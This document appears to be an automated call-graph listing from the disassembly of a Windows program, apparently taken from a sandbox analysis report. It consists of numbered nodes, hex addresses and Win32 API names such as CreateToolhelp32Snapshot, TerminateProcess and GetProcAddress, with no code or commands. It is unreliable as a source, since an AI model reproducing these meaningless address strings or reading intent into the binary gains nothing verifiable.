101421->100942 101423 ed01fe 101467 ed03f4 57 API calls 101423->101467 101424 ed0216 101426 ed027c 101424->101426 101427 ed0226 101424->101427 101426->101421 101428 ed02ac 101426->101428 101429 ed0312 101426->101429 101450 ed025e 101427->101450 101468 ed2660 24 API calls 101427->101468 101432 ed02dc 101428->101432 101437 ed02b1 101428->101437 101430 ed03bb 101429->101430 101431 ed031b 101429->101431 101430->101421 101476 e6b4af 39 API calls 101430->101476 101433 ed0320 101431->101433 101440 ed0398 101431->101440 101432->101421 101472 e6b8cb 39 API calls 101432->101472 101438 ed035f 101433->101438 101439 ed0326 101433->101439 101437->101421 101471 e6b8cb 39 API calls 101437->101471 101438->101421 101474 e6b4af 39 API calls 101438->101474 101439->101421 101473 e6b4af 39 API calls 101439->101473 101440->101421 101475 e6b4af 39 API calls 101440->101475 101445 ed0232 101469 ed2660 24 API calls 101445->101469 101448 ed0249 101470 ed2660 24 API calls 101448->101470 101458 ed164f 101450->101458 101452 ed0102 101451->101452 101456 ed00c6 101451->101456 101453 e6b7fd 39 API calls 101452->101453 101454 ed0100 101453->101454 101454->101421 101454->101423 101454->101424 101455 e67d90 53 API calls 101455->101456 101456->101454 101456->101455 101477 e84ca8 40 API calls 101456->101477 101459 ed165a 101458->101459 101460 e8005b 22 API calls 101459->101460 101461 ed1661 101460->101461 101462 ed166d 101461->101462 101463 ed168e 101461->101463 101465 e8008b 22 API calls 101462->101465 101464 e8008b 22 API calls 101463->101464 101466 ed1676 101464->101466 101465->101466 101466->101421 101467->101421 101468->101445 101469->101448 101470->101450 101471->101421 101472->101421 101473->101421 101474->101421 101475->101421 101476->101421 101477->101456 101479 e6694c 22 API calls 101478->101479 101485 e6a425 101479->101485 101480 e6a64b 101481 e6aa39 22 API calls 101480->101481 101484 e6a665 101481->101484 101484->100954 101485->101480 101486 eafc70 101485->101486 101487 e6aa39 22 API calls 101485->101487 101488 eafb49 101485->101488 101489 e6abe7 22 API calls 101485->101489 101492 e69c10 22 API calls 101485->101492 101499 eafba4 101485->101499 101500 e6b139 22 API calls 101485->101500 101501 e6ab97 22 API calls 101485->101501 101502 e6a99d 101485->101502 101504 e8008b 22 API calls 101485->101504 101506 e67ea0 101485->101506 101516 e66ac7 101485->101516 101530 ec9d48 84 API calls 101486->101530 101487->101485 101494 e8005b 22 API calls 101488->101494 101489->101485 101492->101485 101493 eafc7e 101495 e6aa39 22 API calls 101493->101495 101496 eafb6a 101494->101496 101497 eafc94 101495->101497 101498 e8008b 22 API calls 101496->101498 101497->101484 101498->101499 101499->101502 101503 e6a61c CharUpperBuffW 101500->101503 101501->101485 101531 ec9d48 84 API calls 101502->101531 101503->101485 101504->101485 101505->100957 101509 e67ece 101506->101509 101507 e6abe7 22 API calls 101507->101509 101508 e6803f 101510 e65954 22 API calls 101508->101510 101509->101507 101509->101508 101512 e69c10 22 API calls 101509->101512 101513 e67f7c 101509->101513 101533 e8d1e5 39 API calls 101509->101533 101511 e67f83 101510->101511 101511->101485 101512->101509 101532 e8657b 39 API calls 101513->101532 101517 e6abe7 22 API calls 101516->101517 101518 e66ad6 101517->101518 101519 ea5453 101518->101519 101520 e66beb 22 API calls 101518->101520 101522 e66b44 101518->101522 101521 e8005b 22 API calls 101519->101521 101520->101518 101525 ea545d 101521->101525 101523 e6b139 22 API calls 101522->101523 101524 e66b4b CharUpperBuffW 101523->101524 101528 e66b5d 101524->101528 101526 e8008b 22 API calls 101525->101526 101527 e66b64 101526->101527 101527->101485 101528->101527 101529 e6ab97 22 API calls 101528->101529 101529->101527 101530->101493 101531->101484 101532->101511 101533->101509 101535 e8008b 22 API calls 101534->101535 101536 e67e85 101535->101536 101537 e8005b 22 API calls 101536->101537 101538 e67e91 101537->101538 101538->100966 101540 e7fae5 101539->101540 101541 e7fb1c 101539->101541 101543 e8008b 22 API calls 101540->101543 101551 e7fda0 22 API calls 101541->101551 101544 e7faec WideCharToMultiByte 101543->101544 101550 e7fb25 22 API calls 101544->101550 101546 e7fb10 101546->100971 101548 e8005b 22 API calls 101547->101548 101549 e63269 101548->101549 101549->100978 101549->100979 101550->101546 101551->101546 101553 e8005b 22 API calls 101552->101553 101554 e7baf0 101553->101554 101555 e6a1b9 22 API calls 101554->101555 101556 e7bafb 101555->101556 101556->100992 101558 e6289f 101557->101558 101573 e64d92 101558->101573 101561 e62925 101563 ea306f Shell_NotifyIconW 101561->101563 101564 e62943 Shell_NotifyIconW 101561->101564 101577 e62960 101564->101577 101566 e62959 101566->100995 101568 e62872 101567->101568 101569 e62822 101567->101569 101568->100995 101570 e62841 Shell_NotifyIconW 101569->101570 101570->101568 101571->100995 101572->100995 101574 e628f4 101573->101574 101575 e64dae 101573->101575 101574->101561 101607 eccf2a 42 API calls 101574->101607 101575->101574 101576 ea3f85 DestroyIcon 101575->101576 101576->101574 101578 e6297d 101577->101578 101597 e62a5f 101577->101597 101579 e6694c 22 API calls 101578->101579 101580 e6298b 101579->101580 101581 ea307c LoadStringW 101580->101581 101582 e62998 101580->101582 101585 ea3096 101581->101585 101583 e673e7 22 API calls 101582->101583 101584 e629ad 101583->101584 101586 e629ba 101584->101586 101593 ea30b2 101584->101593 101588 e6ad43 22 API calls 101585->101588 101591 e629e0 101585->101591 101586->101585 101587 e629c4 101586->101587 101589 e65954 22 API calls 101587->101589 101588->101591 101590 e629d2 101589->101590 101592 e66a2c 22 API calls 101590->101592 101595 e62a45 Shell_NotifyIconW 101591->101595 101592->101591 101593->101591 101594 ea30f5 101593->101594 101596 e6addd 22 API calls 101593->101596 101609 e7fd85 51 API calls 101594->101609 101595->101597 101598 ea30dc 101596->101598 101597->101566 101608 eca03c 23 API calls 101598->101608 101601 ea30e7 101603 e66a2c 22 API calls 101601->101603 101602 ea3114 101604 e65954 22 API calls 101602->101604 101603->101594 101605 ea3125 101604->101605 101606 e65954 22 API calls 101605->101606 101606->101591 101607->101561 101608->101601 101609->101602 101610->101015 101612 e67d90 53 API calls 101611->101612 101613 ee87e9 101612->101613 101628 ee882e 101613->101628 101646 ee952c 101613->101646 101615 ee8ada 101618 ee8ae8 101615->101618 101689 ee973d 101615->101689 101618->101628 101659 ee86df 101618->101659 101619 e67d90 53 API calls 101625 ee88a2 101619->101625 101624 ee8b21 101674 e7fef0 101624->101674 101625->101615 101625->101619 101625->101628 101723 ec480d 22 API calls 101625->101723 101724 ee8d76 42 API calls 101625->101724 101628->101018 101629 ee8b5b 101678 e66c89 101629->101678 101630 ee8b41 101725 ed3dec 82 API calls 101630->101725 101633 ee8b4c GetCurrentProcess TerminateProcess 101633->101629 101647 e6b139 22 API calls 101646->101647 101648 ee9547 CharLowerBuffW 101647->101648 101730 ec94f2 101648->101730 101652 e6addd 22 API calls 101653 ee9583 101652->101653 101654 e675ac 22 API calls 101653->101654 101655 ee9597 101654->101655 101656 e68645 22 API calls 101655->101656 101658 ee95a1 101656->101658 101657 ee96b7 101657->101625 101658->101657 101737 ee8d76 42 API calls 101658->101737 101660 ee86fa 101659->101660 101664 ee8745 101659->101664 101661 e8008b 22 API calls 101660->101661 101662 ee871c 101661->101662 101663 e8005b 22 API calls 101662->101663 101662->101664 101663->101662 101665 ee98ef 101664->101665 101666 ee9b04 101665->101666 101672 ee9913 101665->101672 101666->101624 101667 e6b7fd 39 API calls 101667->101672 101668 e6b8cb 39 API calls 101668->101672 101669 e6b4af 39 API calls 101669->101672 101670 e8ec8c 21 API calls 101670->101672 101671 e67d90 53 API calls 101671->101672 101672->101666 101672->101667 101672->101668 101672->101669 101672->101670 101672->101671 101738 ecf6d0 24 API calls 101672->101738 101676 e7ff05 101674->101676 101675 e7ff9d CreateToolhelp32Snapshot 101677 e7ff6b 101675->101677 101676->101675 101676->101677 101677->101629 101677->101630 101679 e66c91 101678->101679 101680 e8005b 22 API calls 101679->101680 101681 e66c9f 101680->101681 101682 e672b0 22 API calls 101681->101682 101683 e66ca7 101682->101683 101684 e672e0 101683->101684 101739 e6b5d0 101684->101739 101690 e67d90 53 API calls 101689->101690 101691 ee9758 101690->101691 101692 ee978c 101691->101692 101693 ee97a7 101691->101693 101694 e67d90 53 API calls 101692->101694 101695 e6b7fd 39 API calls 101693->101695 101696 ee9791 LoadLibraryW 101694->101696 101697 ee97ac 101695->101697 101698 ee97d1 101696->101698 101697->101698 101700 e6b7fd 39 API calls 101697->101700 101699 ee9803 101698->101699 101713 ee97e5 101698->101713 101701 ee983e 101699->101701 101702 ee9812 101699->101702 101703 ee97c0 101700->101703 101705 e6b7fd 39 API calls 101701->101705 101704 e67e72 22 API calls 101702->101704 101703->101698 101707 e6b7fd 39 API calls 101703->101707 101706 ee981a 101704->101706 101708 ee9843 GetProcAddress 101705->101708 101710 e7fabb 24 API calls 101706->101710 101707->101698 101709 ee9850 101708->101709 101712 ee98a5 101709->101712 101709->101713 101714 ee983c 101709->101714 101711 ee9825 GetProcAddress 101710->101711 101711->101714 101712->101713 101716 ee98aa FreeLibrary 101712->101716 101713->101618 101714->101709 101715 e69c10 22 API calls 101714->101715 101717 ee9874 101715->101717 101716->101713 101718 e67e72 22 API calls 101717->101718 101719 ee987c 101718->101719 101720 e7fabb 24 API calls 101719->101720 101723->101625 101724->101625 101725->101633 101731 ec9512 101730->101731 101732 ec9547 101731->101732 101735 ec9606 101731->101735 101736 ec9601 101731->101736 101733 e7de05 41 API calls 101732->101733 101732->101736 101733->101732 101734 e7de05 41 API calls 101734->101735 101735->101734 101735->101736 101736->101652 101736->101658 101737->101657 101738->101672 102380 e6260f 102383 e62629 102380->102383 102384 e62640 102383->102384 102385 e626a4 102384->102385 102386 e62645 102384->102386 102422 e626a2 102384->102422 102388 ea2d82 102385->102388 102389 e626aa 102385->102389 102390 e62652 102386->102390 102391 e6271e PostQuitMessage 102386->102391 102387 e62689 DefWindowProcW 102424 e62623 102387->102424 102438 e61eb7 10 API calls 102388->102438 102392 e626d6 SetTimer RegisterWindowMessageW 102389->102392 102393 e626b1 102389->102393 102395 ea2e03 102390->102395 102396 e6265d 102390->102396 102391->102424 102400 e626ff CreatePopupMenu 102392->102400 102392->102424 102397 ea2d23 102393->102397 102398 e626ba KillTimer 102393->102398 102441 ecc5e6 66 API calls 102395->102441 102401 e62667 102396->102401 102402 ea2def 102396->102402 102404 ea2d28 102397->102404 102405 ea2d5e MoveWindow 102397->102405 102406 e62810 Shell_NotifyIconW 102398->102406 102399 ea2da3 102439 e7ece7 41 API calls 102399->102439 102400->102424 102409 e62672 102401->102409 102410 ea2dd4 102401->102410 102428 ecc817 102402->102428 102411 ea2d2e 102404->102411 102412 ea2d4d SetFocus 102404->102412 102405->102424 102413 e626cd 102406->102413 102414 e6270c 102409->102414 102415 e6267d 102409->102415 102410->102387 102440 ec1161 22 API calls 102410->102440 102411->102415 102417 ea2d37 102411->102417 102412->102424 102435 e647dd DeleteObject DestroyWindow 102413->102435 102436 e62728 76 API calls 102414->102436 102415->102387 102425 e62810 Shell_NotifyIconW 102415->102425 102416 ea2e15 102416->102387 102416->102424 102437 e61eb7 10 API calls 102417->102437 102422->102387 102423 e6271c 102423->102424 102426 ea2dc8 102425->102426 102427 e62874 61 API calls 102426->102427 102427->102422 102429 ecc92c 102428->102429 102430 ecc82f 102428->102430 102429->102424 102431 e62960 56 API calls 102430->102431 102433 ecc856 102431->102433 102432 ecc915 KillTimer SetTimer 102432->102429 102433->102432 102434 ecc907 Shell_NotifyIconW 102433->102434 102434->102432 102435->102424 102436->102423 102437->102424 102438->102399 102439->102415 102440->102422 102441->102416 102442 eb2f82 102457 e6dd20 102442->102457 102443 e6e081 PeekMessageW 102443->102457 102444 e6dd77 GetInputState 102444->102443 102444->102457 102445 eb2240 TranslateAcceleratorW 102445->102457 102447 e6e0ff PeekMessageW 102447->102457 102448 e6e0e3 TranslateMessage DispatchMessageW 102448->102447 102449 e6df74 timeGetTime 102449->102457 102450 e6e11f Sleep 102467 e6e130 102450->102467 102451 eb30f6 Sleep 102451->102467 102452 eb235c timeGetTime 102509 e7a8f3 23 API calls 102452->102509 102453 e7ed9f timeGetTime 102453->102467 102456 eb318d GetExitCodeProcess 102461 eb31b9 CloseHandle 102456->102461 102462 eb31a3 WaitForSingleObject 102456->102462 102457->102443 102457->102444 102457->102445 102457->102447 102457->102448 102457->102449 102457->102450 102457->102451 102457->102452 102459 e6df45 102457->102459 102470 e6f1b0 229 API calls 102457->102470 102471 e6c1f0 229 API calls 102457->102471 102472 e71990 229 API calls 102457->102472 102474 e6e2c0 102457->102474 102481 e6e540 102457->102481 102504 e7f02b 102457->102504 102510 ed427a 22 API calls 102457->102510 102511 ed3dec 82 API calls 102457->102511 102458 ef3224 GetForegroundWindow 102458->102467 102461->102467 102462->102457 102462->102461 102463 eb2fb3 102463->102459 102464 eb322b Sleep 102464->102457 102467->102453 102467->102456 102467->102457 102467->102458 102467->102459 102467->102463 102467->102464 102512 ee5eb1 22 API calls 102467->102512 102513 ecf09d QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102467->102513 102514 ecdb92 47 API calls 102467->102514 102470->102457 102471->102457 102472->102457 102475 e6e2f3 102474->102475 102476 e6e2df 102474->102476 102549 ed3dec 82 API calls 102475->102549 102515 e6d7d0 102476->102515 102478 e6e2ea 102478->102457 102480 eb34f7 102480->102480 102482 e6e580 102481->102482 102503 e6e64c 102482->102503 102558 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102482->102558 102485 eb354c 102487 e6addd 22 API calls 102485->102487 102485->102503 102486 e6addd 22 API calls 102486->102503 102490 eb3566 102487->102490 102488 e6ac97 40 API calls 102488->102503 102559 e80323 29 API calls 102490->102559 102493 ed3dec 82 API calls 102493->102503 102494 eb3570 102560 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102494->102560 102496 e6ad43 22 API calls 102496->102503 102497 e70b10 22 API calls 102497->102503 102498 e6e951 102498->102457 102499 e6f1b0 229 API calls 102499->102503 102503->102486 102503->102488 102503->102493 102503->102496 102503->102497 102503->102498 102503->102499 102557 e7b1e7 229 API calls 102503->102557 102561 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102503->102561 102562 e80323 29 API calls 102503->102562 102563 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102503->102563 102564 ee502d 229 API calls 102503->102564 102565 ee711a 229 API calls 102503->102565 102505 e7f03e 102504->102505 102506 e7f047 102504->102506 102505->102457 102506->102505 102507 e7f06b IsDialogMessageW 102506->102507 102508 ebf6eb GetClassLongW 102506->102508 102507->102505 102507->102506 102508->102506 102508->102507 102509->102457 102510->102457 102511->102457 102512->102467 102513->102467 102514->102467 102516 e6f1b0 229 API calls 102515->102516 102518 e6d80d 102516->102518 102517 eb2152 102556 ed3dec 82 API calls 102517->102556 102518->102517 102520 e6d87b 102518->102520 102521 e6dc45 102518->102521 102527 e6d875 102518->102527 102544 e6d999 102518->102544 102520->102478 102521->102520 102532 e8008b 22 API calls 102521->102532 102522 e6d933 102522->102521 102524 e6d93e 102522->102524 102523 e6db6f 102525 e6db84 102523->102525 102526 eb2137 102523->102526 102529 e8005b 22 API calls 102524->102529 102530 e8005b 22 API calls 102525->102530 102555 ee5f5e 22 API calls 102526->102555 102527->102520 102527->102521 102527->102522 102528 e6da28 102527->102528 102538 e8005b 22 API calls 102527->102538 102533 e8008b 22 API calls 102528->102533 102536 e6d945 102529->102536 102541 e6d9da 102530->102541 102532->102536 102533->102544 102534 eb2146 102534->102478 102535 e8005b 22 API calls 102537 e6d966 102535->102537 102536->102535 102536->102537 102537->102544 102550 e6c0d0 229 API calls 102537->102550 102538->102527 102540 eb2126 102554 ed3dec 82 API calls 102540->102554 102541->102478 102544->102523 102544->102540 102544->102541 102545 eb2101 102544->102545 102547 eb20df 102544->102547 102551 e63536 229 API calls 102544->102551 102553 ed3dec 82 API calls 102545->102553 102552 ed3dec 82 API calls 102547->102552 102549->102480 102550->102544 102551->102544 102552->102541 102553->102541 102554->102541 102555->102534 102556->102520 102557->102503 102558->102485 102559->102494 102560->102503 102561->102503 102562->102503 102563->102503 102564->102503 102565->102503 102566 e6e34c 102569 e6b920 102566->102569 102570 e6b93b 102569->102570 102571 eb047f 102570->102571 102572 eb0431 102570->102572 102591 e6b960 102570->102591 102609 ee60fb 229 API calls 102571->102609 102575 eb043b 102572->102575 102578 eb0448 102572->102578 102572->102591 102607 ee658c 229 API calls 102575->102607 102577 e7bae3 22 API calls 102577->102591 102590 e6bc30 102578->102590 102608 ee6a29 229 API calls 102578->102608 102581 eb0712 102581->102581 102583 e6bdf0 40 API calls 102583->102591 102586 e6bc5e 102587 eb065b 102611 ee6465 82 API calls 102587->102611 102590->102586 102612 ed3dec 82 API calls 102590->102612 102591->102577 102591->102583 102591->102586 102591->102587 102591->102590 102592 e6ac97 40 API calls 102591->102592 102593 e6a358 22 API calls 102591->102593 102596 e7e2a2 40 API calls 102591->102596 102597 e6f1b0 229 API calls 102591->102597 102598 e6ad43 22 API calls 102591->102598 102600 e7e25c 40 API calls 102591->102600 102601 e7a927 229 API calls 102591->102601 102602 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102591->102602 102603 e80323 29 API calls 102591->102603 102604 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102591->102604 102605 e7efb1 82 API calls 102591->102605 102606 e7ee18 229 API calls 102591->102606 102610 ebfced 22 API calls 102591->102610 102592->102591 102593->102591 102596->102591 102597->102591 102598->102591 102600->102591 102601->102591 102602->102591 102603->102591 102604->102591 102605->102591 102606->102591 102607->102578 102608->102590 102609->102591 102610->102591 102611->102590 102612->102581 102613 e98682 102618 e9843e 102613->102618 102615 e986aa 102624 e9846f 102618->102624 102620 e9866e 102637 e92a6c 26 API calls 102620->102637 102622 e985c3 102622->102615 102630 ea0c05 102622->102630 102623 e985b8 102623->102622 102636 e8f559 20 API calls 102623->102636 102624->102623 102633 e8908b 40 API calls 102624->102633 102626 e9860c 102626->102623 102634 e8908b 40 API calls 102626->102634 102628 e9862b 102628->102623 102635 e8908b 40 API calls 102628->102635 102638 ea0302 102630->102638 102632 ea0c20 102632->102615 102633->102626 102634->102628 102635->102623 102636->102620 102637->102622 102641 ea030e 102638->102641 102639 ea031c 102696 e8f559 20 API calls 102639->102696 102641->102639 102643 ea0355 102641->102643 102642 ea0321 102697 e92a6c 26 API calls 102642->102697 102649 ea08dc 102643->102649 102648 ea032b 102648->102632 102699 ea06b0 102649->102699 102652 ea090e 102731 e8f546 20 API calls 102652->102731 102653 ea0927 102717 e954a1 102653->102717 102656 ea092c 102657 ea094c 102656->102657 102658 ea0935 102656->102658 102730 ea061b CreateFileW 102657->102730 102733 e8f546 20 API calls 102658->102733 102662 ea093a 102734 e8f559 20 API calls 102662->102734 102664 ea0a02 GetFileType 102667 ea0a0d GetLastError 102664->102667 102668 ea0a54 102664->102668 102665 ea0985 102665->102664 102670 ea09d7 GetLastError 102665->102670 102735 ea061b CreateFileW 102665->102735 102666 ea0379 102698 ea03a2 LeaveCriticalSection 102666->102698 102737 e8f523 20 API calls 102667->102737 102739 e953ea 21 API calls 102668->102739 102669 ea0913 102732 e8f559 20 API calls 102669->102732 102736 e8f523 20 API calls 102670->102736 102673 ea0a1b CloseHandle 102673->102669 102675 ea0a44 102673->102675 102738 e8f559 20 API calls 102675->102738 102677 ea09ca 102677->102664 102677->102670 102679 ea0a75 102681 ea0ac1 102679->102681 102740 ea082c 72 API calls 102679->102740 102680 ea0a49 102680->102669 102685 ea0aee 102681->102685 102741 ea03ce 72 API calls 102681->102741 102684 ea0ae7 102684->102685 102686 ea0aff 102684->102686 102742 e9892e 102685->102742 102686->102666 102688 ea0b7d CloseHandle 102686->102688 102757 ea061b CreateFileW 102688->102757 102690 ea0ba8 102691 ea0bb2 GetLastError 102690->102691 102692 ea0bde 102690->102692 102758 e8f523 20 API calls 102691->102758 102692->102666 102694 ea0bbe 102759 e955b3 21 API calls 102694->102759 102696->102642 102697->102648 102698->102648 102700 ea06d1 102699->102700 102705 ea06eb 102699->102705 102700->102705 102767 e8f559 20 API calls 102700->102767 102703 ea06e0 102768 e92a6c 26 API calls 102703->102768 102760 ea0640 102705->102760 102706 ea0752 102714 ea07a5 102706->102714 102771 e8d98d 26 API calls 102706->102771 102707 ea0723 102707->102706 102769 e8f559 20 API calls 102707->102769 102710 ea07a0 102712 ea081f 102710->102712 102710->102714 102711 ea0747 102770 e92a6c 26 API calls 102711->102770 102772 e92a7c 11 API calls 102712->102772 102714->102652 102714->102653 102716 ea082b 102718 e954ad 102717->102718 102775 e931de EnterCriticalSection 102718->102775 102720 e954d9 102722 e95280 21 API calls 102720->102722 102724 e954de 102722->102724 102723 e954b4 102723->102720 102726 e95547 EnterCriticalSection 102723->102726 102727 e954fb 102723->102727 102724->102727 102779 e953c7 EnterCriticalSection 102724->102779 102725 e95524 102725->102656 102726->102727 102728 e95554 LeaveCriticalSection 102726->102728 102776 e955aa 102727->102776 102728->102723 102730->102665 102731->102669 102732->102666 102733->102662 102734->102669 102735->102677 102736->102669 102737->102673 102738->102680 102739->102679 102740->102681 102741->102684 102743 e95644 26 API calls 102742->102743 102746 e9893e 102743->102746 102744 e98944 102781 e955b3 21 API calls 102744->102781 102746->102744 102748 e95644 26 API calls 102746->102748 102756 e98976 102746->102756 102747 e95644 26 API calls 102749 e98982 FindCloseChangeNotification 102747->102749 102752 e9896d 102748->102752 102749->102744 102753 e9898e GetLastError 102749->102753 102750 e9899c 102751 e989be 102750->102751 102782 e8f523 20 API calls 102750->102782 102751->102666 102755 e95644 26 API calls 102752->102755 102753->102744 102755->102756 102756->102744 102756->102747 102757->102690 102758->102694 102759->102692 102762 ea0658 102760->102762 102761 ea0673 102761->102707 102762->102761 102773 e8f559 20 API calls 102762->102773 102764 ea0697 102774 e92a6c 26 API calls 102764->102774 102766 ea06a2 102766->102707 102767->102703 102768->102705 102769->102711 102770->102706 102771->102710 102772->102716 102773->102764 102774->102766 102775->102723 102780 e93226 LeaveCriticalSection 102776->102780 102778 e955b1 102778->102725 102779->102727 102780->102778 102781->102750 102782->102751 102783 e62aca 102784 e62ad7 102783->102784 102785 e62af0 102784->102785 102786 ea313a 102784->102786 102787 e6462f 23 API calls 102785->102787 102788 ea3156 GetOpenFileNameW 102786->102788 102789 e62af9 102787->102789 102790 ea31a5 102788->102790 102799 e62a8c 102789->102799 102792 e673e7 22 API calls 102790->102792 102794 ea31ba 102792->102794 102794->102794 102796 e62b0e 102817 e65009 102796->102817 102800 ea21d0 102799->102800 102801 e62a99 GetLongPathNameW 102800->102801 102802 e673e7 22 API calls 102801->102802 102803 e62ac1 102802->102803 102804 e6442a 102803->102804 102805 e6addd 22 API calls 102804->102805 102806 e6443c 102805->102806 102807 e6462f 23 API calls 102806->102807 102808 e64447 102807->102808 102809 e64452 102808->102809 102812 ea3dbb 102808->102812 102811 e656ec 22 API calls 102809->102811 102810 e7de05 41 API calls 102810->102812 102813 e6445e 102811->102813 102812->102810 102814 ea3ddd 102812->102814 102846 e612f4 102813->102846 102816 e64471 102816->102796 102852 e652f1 102817->102852 102820 ea418a 102821 e652f1 94 API calls 102847 e61306 102846->102847 102851 e61325 102846->102851 102849 e8008b 22 API calls 102847->102849 102848 e8005b 22 API calls 102850 e6133c 102848->102850 102849->102851 102850->102816 102851->102848 102995 e652b6 LoadLibraryA 102852->102995 102857 ea447f 102860 e6535f 68 API calls 102857->102860 102858 e6531c LoadLibraryExW 103003 e6527f LoadLibraryA 102858->103003 102861 ea4486 102860->102861 102863 e6527f 3 API calls 102861->102863 102865 ea448e 102863->102865 103024 e654ba 102865->103024 102866 e65346 102866->102865 102867 e65352 102866->102867 102869 e6535f 68 API calls 102867->102869 102871 e6502e 102869->102871 102871->102820 102871->102821 102873 ea44b5 102996 e652ce GetProcAddress 102995->102996 102997 e652ec 102995->102997 102998 e652de 102996->102998 103000 e8e86b 102997->103000 102998->102997 102999 e652e5 FreeLibrary 102998->102999 102999->102997 103030 e8e7aa 103000->103030 103002 e65310 103002->102857 103002->102858 103004 e65294 GetProcAddress 103003->103004 103005 e652b3 103003->103005 103006 e652a4 103004->103006 103008 e65390 103005->103008 103006->103005 103007 e652ac FreeLibrary 103006->103007 103007->103005 103009 e8008b 22 API calls 103008->103009 103010 e653a5 103009->103010 103011 e63257 22 API calls 103010->103011 103013 e653b1 103011->103013 103012 ea44f9 103088 ed389d 74 API calls 103012->103088 103013->103012 103016 e653ec 103013->103016 103087 ed3819 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 103013->103087 103017 e654ba 40 API calls 103016->103017 103018 ea453d 103016->103018 103021 e65480 103016->103021 103082 e654e4 103016->103082 103017->103016 103020 e654e4 64 API calls 103018->103020 103022 ea456c 103020->103022 103021->102866 103023 e654ba 40 API calls 103022->103023 103023->103021 103025 e654cc 103024->103025 103026 ea4597 103024->103026 103135 e8eb44 103025->103135 103029 ed30c8 27 API calls 103029->102873 103033 e8e7b6 103030->103033 103031 e8e7c4 103055 e8f559 20 API calls 103031->103055 103033->103031 103035 e8e7f4 103033->103035 103034 e8e7c9 103056 e92a6c 26 API calls 103034->103056 103037 e8e7f9 103035->103037 103038 e8e806 103035->103038 103057 e8f559 20 API calls 103037->103057 103047 e982e1 103038->103047 103041 e8e80f 103043 e8e822 103041->103043 103044 e8e815 103041->103044 103042 e8e7d4 103042->103002 103059 e8e854 LeaveCriticalSection 103043->103059 103058 e8f559 20 API calls 103044->103058 103048 e982ed 103047->103048 103060 e931de EnterCriticalSection 103048->103060 103050 e982fb 103061 e9837b 103050->103061 103054 e9832c 103054->103041 103055->103034 103056->103042 103057->103042 103058->103042 103059->103042 103060->103050 103069 e9839e 103061->103069 103062 e98308 103074 e98337 103062->103074 103063 e983f7 103064 e94efd 20 API calls 103063->103064 103065 e98400 103064->103065 103067 e92c48 20 API calls 103065->103067 103068 e98409 103067->103068 103068->103062 103079 e93685 11 API calls 103068->103079 103069->103062 103069->103063 103069->103069 103077 e8940d EnterCriticalSection 103069->103077 103078 e89421 LeaveCriticalSection 103069->103078 103071 e98428 103080 e8940d EnterCriticalSection 103071->103080 103081 e93226 LeaveCriticalSection 103074->103081 103076 e9833e 103076->103054 103077->103069 103078->103069 103079->103071 103080->103062 103081->103076 103083 e654f3 103082->103083 103084 ea45b7 103082->103084 103089 e8ef63 103083->103089 103087->103012 103088->103016 103092 e8ed2a 103089->103092 103096 e8ed36 103092->103096 103093 e8ed42 103095 e8ed68 103096->103093 103096->103095 103138 e8eb61 103135->103138 103137 e654dd 103137->103029 103139 e8eb6d 103138->103139 103140 e8ebad 103139->103140 103141 e8eb80 103139->103141 103142 e8eba5 103139->103142 103151 e8940d EnterCriticalSection 103140->103151 103165 e8f559 20 API calls 103141->103165 103142->103137 103144 e8ebb7 103152 e8e978 103144->103152 103147 e8eb9a 103166 e92a6c 26 API calls 103147->103166 103151->103144 103153 e8e9a7 103152->103153 103157 e8e98a 103152->103157 103157->103153 103165->103147 103166->103142 103542 e7fa8a 103543 e7fa94 103542->103543 103547 e7fab5 103542->103547 103544 e6b21b 22 API calls 103543->103544 103545 e7faa4 103544->103545 103548 e6b21b 22 API calls 103545->103548 103549 ebfb21 103547->103549 103551 ec53e8 22 API calls 103547->103551 103550 e7fab4 103548->103550 103551->103547 103552 e63297 103553 e632a4 103552->103553 103568 e649e8 103553->103568 103555 e632a9 103567 e63323 103555->103567 103579 e6394f 103555->103579 103557 e632b6 103557->103567 103590 e63609 103557->103590 103559 e632bf 103560 e632c3 GetFullPathNameW 103559->103560 103559->103567 103561 e673e7 22 API calls 103560->103561 103562 e632ef 103561->103562 103563 e673e7 22 API calls 103562->103563 103564 e632fc 103563->103564 103565 ea379f 103564->103565 103566 e673e7 22 API calls 103564->103566 103566->103567 103569 e64a0f 103568->103569 103577 e64b2c 103568->103577 103570 e8008b 22 API calls 103569->103570 103569->103577 103572 e64a36 103570->103572 103571 e8008b 22 API calls 103578 e64aab 103571->103578 103572->103571 103573 e64b84 22 API calls 103573->103578 103575 e6a400 86 API calls 103575->103578 103576 e6aa39 22 API calls 103576->103578 103577->103555 103578->103573 103578->103575 103578->103576 103578->103577 103602 ed120b 22 API calls 103578->103602 103588 e63a0b 103579->103588 103580 e63d2c 103604 e63fad 82 API calls 103580->103604 103582 ea3a55 103605 e63f7e 22 API calls 103582->103605 103585 ea38a8 103606 ed3dec 82 API calls 103585->103606 103587 e63f7e 22 API calls 103587->103588 103588->103580 103588->103582 103588->103585 103588->103587 103589 e63cc4 103588->103589 103603 e63fad 82 API calls 103588->103603 103589->103557 103594 e63615 103590->103594 103591 e636f0 103622 e638b3 22 API calls 103591->103622 103593 e636fa 103593->103559 103594->103591 103594->103593 103595 ea3823 103594->103595 103596 e6a1b9 22 API calls 103594->103596 103598 e6b060 23 API calls 103594->103598 103599 e63701 103594->103599 103607 e66dca 103594->103607 103624 ed3dec 82 API calls 103595->103624 103596->103594 103598->103594 103623 ed3dec 82 API calls 103599->103623 103602->103578 103603->103588 103604->103589 103605->103585 103606->103589 103608 e6addd 22 API calls 103607->103608 103620 e66dde 103608->103620 103609 e66f82 103610 e66f9a 103609->103610 103621 e6703e 103609->103621 103613 e66fb9 103610->103613 103616 e6ad43 22 API calls 103610->103616 103619 e66fe8 103610->103619 103612 ea556d 103637 ed3dec 82 API calls 103612->103637 103625 e7eaaf 103613->103625 103614 ea555c 103614->103594 103615 e656ec 22 API calls 103615->103620 103616->103613 103619->103594 103620->103609 103620->103612 103620->103615 103620->103621 103636 ed3dec 82 API calls 103621->103636 103622->103593 103623->103593 103624->103593 103626 e7eabb 